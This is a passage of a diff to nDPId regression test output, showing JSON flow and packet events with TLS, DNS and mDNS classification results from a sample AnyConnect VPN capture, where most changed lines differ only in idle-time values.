-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} -01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="} 00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -87,8 +87,8 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} -00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} 